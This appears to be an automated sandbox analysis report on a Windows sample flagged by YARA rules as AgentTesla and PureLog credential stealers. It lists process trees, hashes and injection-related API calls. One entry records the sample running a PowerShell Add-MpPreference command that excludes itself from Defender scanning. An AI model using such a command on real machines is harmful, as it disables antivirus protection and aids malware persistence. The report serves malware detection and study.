                                                Imagebase:0x310000
                                                File size:634'368 bytes
                                                MD5 hash:ED1E2FD68E9DE44EA4E01C7897F64411
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
                                                Imagebase:0x10000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Users\user\Desktop\20240328-REV2.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\20240328-REV2.exe"
                                                Imagebase:0x480000
                                                File size:634'368 bytes
                                                MD5 hash:ED1E2FD68E9DE44EA4E01C7897F64411
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:8
                                                Start time:10:06:27
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796
                                                Imagebase:0xee0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:10:06:29
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff605670000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:197
                                                  Total number of Limit Nodes:19
                                                  execution_graph (rendered graph widget; the node/edge serialization is omitted). API calls reached by the graph, in order of appearance: DrawTextExW, CreateActCtxA, DuplicateHandle, WriteProcessMemory, VirtualAllocEx, Wow64SetThreadContext, ResumeThread, PostMessageW, ReadProcessMemory, CreateProcessA, GetCurrentThreadId, KiUserExceptionDispatcher, GetModuleHandleW, LoadLibraryExW, GetCurrentProcess, GetCurrentThread.

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph (rendered graph widget; the basic-block edge serialization is omitted). Basic blocks span 895a688 through 895b705; no API calls appear in this graph.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &IH3
                                                  • API String ID: 0-1546010026
                                                  • Opcode ID: d16f7d7e1d4b9c9045519bf08de7307ea3f07c9449e197dc9ecf28b621b83895
                                                  • Instruction ID: 6b6d120619938bc8c510175d9a9e3d28685ecc3ac3d1700a19716af27e2be75e
                                                  • Opcode Fuzzy Hash: d16f7d7e1d4b9c9045519bf08de7307ea3f07c9449e197dc9ecf28b621b83895
                                                  • Instruction Fuzzy Hash: 57B2C275E00228CFDB64DF69C984AD9BBB2FF89305F1581E9D509AB225DB319E81CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph (rendered graph widget; the basic-block edge serialization is omitted). Basic blocks span 70ba135 through 70ba5b5, with internal calls to 70b7748 and 70b9c90 through 70b9d30, and one call to KiUserExceptionDispatcher at block 70ba585-70ba5aa.
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 070BA58F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: b7c469665d98b79f6b52cedd3cfe7be0e307ca79de7717ac05dd6ed98d2f2622
                                                  • Instruction ID: 1873dfaf7c618cc4ea5ec0fa962488d0fac7c4b59f42d5058d51178d07e7792b
                                                  • Opcode Fuzzy Hash: b7c469665d98b79f6b52cedd3cfe7be0e307ca79de7717ac05dd6ed98d2f2622
                                                  • Instruction Fuzzy Hash: 21D19AF1B007058FDBA5EB75C450BAEB7F6AF89700F10856DD24A9B290DB35EA01CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tIh
                                                  • API String ID: 0-443931868
                                                  • Opcode ID: c75b4ed9251025c279c6177c6db3b5fd4864dcfc2bf9ed80377e19b17210893a
                                                  • Instruction ID: 005339484071efa8a06cd73a5a10e59472cf680b6db983a5cddcdfe51ec51813
                                                  • Opcode Fuzzy Hash: c75b4ed9251025c279c6177c6db3b5fd4864dcfc2bf9ed80377e19b17210893a
                                                  • Instruction Fuzzy Hash: 0AD11270E2471ADFDB44CFA9C5818AEFBB6FB88300F10A559D416AB215D734AA42CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )"
                                                  • API String ID: 0-4237191880
                                                  • Opcode ID: 93d7232bbbebb3c9aae57c32a008238c869988bd3dbe0b4423ffcb711e35db88
                                                  • Instruction ID: b3c187627ee03f0706cfa633fcbb435965b1d792e555af774667b61f8ebbf3f7
                                                  • Opcode Fuzzy Hash: 93d7232bbbebb3c9aae57c32a008238c869988bd3dbe0b4423ffcb711e35db88
                                                  • Instruction Fuzzy Hash: 5881C174E002099FDB48CFEAC984AEEBBB2FF88310F24942AD415AB254D774A945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7eca868270da5558a3811e79a242512c50c8445afbed7909ad68a04fb76e1708
                                                  • Instruction ID: 604172825300afc21d93914cd60c05a51cb99d24d27edff4a9c5542682d7a12c
                                                  • Opcode Fuzzy Hash: 7eca868270da5558a3811e79a242512c50c8445afbed7909ad68a04fb76e1708
                                                  • Instruction Fuzzy Hash: 5872D030B002158FDB58EB78C858B6E77A6AFC9751F248569D80ADB3A0CF34DD06D7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca7b84f1ae91ecf3e37b83013d38515b7a9038bfc8b05f0f33137d8742f8b906
                                                  • Instruction ID: 815f4b524fb318d432e6dc6f5a4566d44ba35008e96a06013631bb994ff3f2ca
                                                  • Opcode Fuzzy Hash: ca7b84f1ae91ecf3e37b83013d38515b7a9038bfc8b05f0f33137d8742f8b906
                                                  • Instruction Fuzzy Hash: C9721E34A00219CFDB15EF68C844AADF7F1BF89311F1586A9D859AB351DB30AD85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2bb63d3d3a28e381bce96f18bc073c4ecf13f3a2122a19be4052e699df74c75f
                                                  • Instruction ID: a52efd88fe99b783defccaf987dbe08c4ddb359674d09b161e30562b71659cc5
                                                  • Opcode Fuzzy Hash: 2bb63d3d3a28e381bce96f18bc073c4ecf13f3a2122a19be4052e699df74c75f
                                                  • Instruction Fuzzy Hash: 87521134A012088FDB14DF68C588A6DB7F2BF89715F2595A8E80A9B361CB74FD46CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584098888.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4d30000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ec4e8c50f76ae46a880fe6b82ea895f72df581c917571cc8263c8ddc096a296
                                                  • Instruction ID: 8ef60efe8e80fdbe209285f20f7a904bdcc48a3ac4ff9511547b6070d361649e
                                                  • Opcode Fuzzy Hash: 1ec4e8c50f76ae46a880fe6b82ea895f72df581c917571cc8263c8ddc096a296
                                                  • Instruction Fuzzy Hash: B9525E34A003568FDB14DF28C844B99B7B2FFC9314F2582A9D5596F3A2DB71A982CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584098888.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4d30000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff4f0b164f684ad7cf6a1cbdcbf8746fba73cf06e7e33f99cbf8bb36917107e5
                                                  • Instruction ID: 61a89bc34078b6c7467165614672b3484194bf1ac77714430f8bd6c38c886581
                                                  • Opcode Fuzzy Hash: ff4f0b164f684ad7cf6a1cbdcbf8746fba73cf06e7e33f99cbf8bb36917107e5
                                                  • Instruction Fuzzy Hash: 9E526E34A003568FDB14DF28C844B99B7B2FFC5314F2582A9D5596F3A2DB71A982CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb73bd0c44af3a4585f2ee4d2ff3f9683d43b90d41be90bae6083f87a1fbc1d5
                                                  • Instruction ID: 0c49bf917cffb78fdb5cff1abf623736c4e7b5c9ce2a53bc372fecf618e75884
                                                  • Opcode Fuzzy Hash: fb73bd0c44af3a4585f2ee4d2ff3f9683d43b90d41be90bae6083f87a1fbc1d5
                                                  • Instruction Fuzzy Hash: 40910370E16308DFDB48CFA9D5809DDBBB2FB89700F20A42AE416BB264D734A945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 025FDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 025FE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 025FE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 025FE0B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 025FDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 025FE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 025FE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 025FE0B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3H5$3H5
                                                  • API String ID: 0-2752242361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070B6076
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025FBF1E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B5666
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 025F5DC9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 025F5DC9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05349F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05349F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070B5C48
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025FE22F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 068eb5b44c03041d340123373b999b6af7f780a07e04071d004d75355094aada
                                                  • Instruction ID: e4c35651ed81192779c7f8d2f8a12f3c66e771f877eca89fd674f24dd9e2a137
                                                  • Opcode Fuzzy Hash: 068eb5b44c03041d340123373b999b6af7f780a07e04071d004d75355094aada
                                                  • Instruction Fuzzy Hash: 8021F4B59002089FDB10CF9AD585ADEBBF5FB48310F14805AE914A7310D374A941CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (rendering omitted): basic blocks 610 (70b5ca0-70b5d35, calls ReadProcessMemory), 614 (70b5d3e-70b5d6e), 615 (70b5d37-70b5d3d); edges 610->614, 610->615, 615->614
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B5D28
Memory Dump Source
• Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 2fe287126e5801a15f1a3c222fb9008338b2dd8d6f48b7ee6c480bc8d2177c40
• Instruction ID: ae6979eb15a247caea3029bad61f9da83f5c70634ff670bef521d81a70c58380
• Opcode Fuzzy Hash: 2fe287126e5801a15f1a3c222fb9008338b2dd8d6f48b7ee6c480bc8d2177c40
• Instruction Fuzzy Hash: 1D2127B18003499FDB10DFAAC844BDEBBF5FF48310F50852DE558A3240C7799510DB64
Uniqueness
Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B5666
Memory Dump Source
• Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: c8f747269ad61bdca09212b399d4c66760619987182b1a5b046d48d3a657ebce
• Instruction ID: c79821adb665e05fa391ba28371380d33e0ff948f11066a5330b9522ab32ef46
• Opcode Fuzzy Hash: c8f747269ad61bdca09212b399d4c66760619987182b1a5b046d48d3a657ebce
• Instruction Fuzzy Hash: 0F2129B1D003098FDB10DFAAC8857EEBBF4EF88614F14842DD559A7240DB789A45CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B5666
Memory Dump Source
• Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 2144c5e48edd355dfe5d8b99c948d726c5f222a523b963d5bb3eeb94669de2cb
• Instruction ID: 89649eeb6bd34ffe1589b314098108ab419a1a96a11d5e631cb23d0cbef7b634
• Opcode Fuzzy Hash: 2144c5e48edd355dfe5d8b99c948d726c5f222a523b963d5bb3eeb94669de2cb
• Instruction Fuzzy Hash: 53213AB190030A9FDB10DFAAC8847EEBBF4AF88324F14852DD559A7240C7789A45CF94
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B5D28
Memory Dump Source
• Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 64ffb41278919a3b8ed7f1b6f6c95ab96746e748bdee848f298f820bf0cebe3e
• Instruction ID: 2565aa7313e8e1f3f22c583faf924d9781fd4a242bfa585ac1dc021eed3c8a5d
• Opcode Fuzzy Hash: 64ffb41278919a3b8ed7f1b6f6c95ab96746e748bdee848f298f820bf0cebe3e
• Instruction Fuzzy Hash: 6A2116B18003499FDB10DFAAC884BDEBBF5FF48310F508529E518A7240C7799510DBA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025FE22F
Memory Dump Source
• Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 52c970d24a0c3cd698c7420772a70feb66d8e6210c4516896386b7c28464acf8
• Instruction ID: 26a116f011fa56b3bf58a3d5881dc4d23b853c3235b541672398036a2d01de0e
• Opcode Fuzzy Hash: 52c970d24a0c3cd698c7420772a70feb66d8e6210c4516896386b7c28464acf8
• Instruction Fuzzy Hash: 8821C4B59003499FDB10CFAAD984ADEFBF9FB48310F14841AE954A3350D374A954CF65
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B5B66
Memory Dump Source
• Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 2e7b500dd08226b12103c46d981c03b9ef5efae2d6c92e73218ba3d0630db1d0
• Instruction ID: 38d660306c2797245ccedffe5e357d2349a083242d2bb9262831e18029373473
• Opcode Fuzzy Hash: 2e7b500dd08226b12103c46d981c03b9ef5efae2d6c92e73218ba3d0630db1d0
• Instruction Fuzzy Hash: C71147B19003099FDB20DFAAC844BDEBFF6AF88310F248819E515A7250C7759951DFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025FBF99,00000800,00000000,00000000), ref: 025FC1AA
Memory Dump Source
• Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
Joe Sandbox IDA Plugin
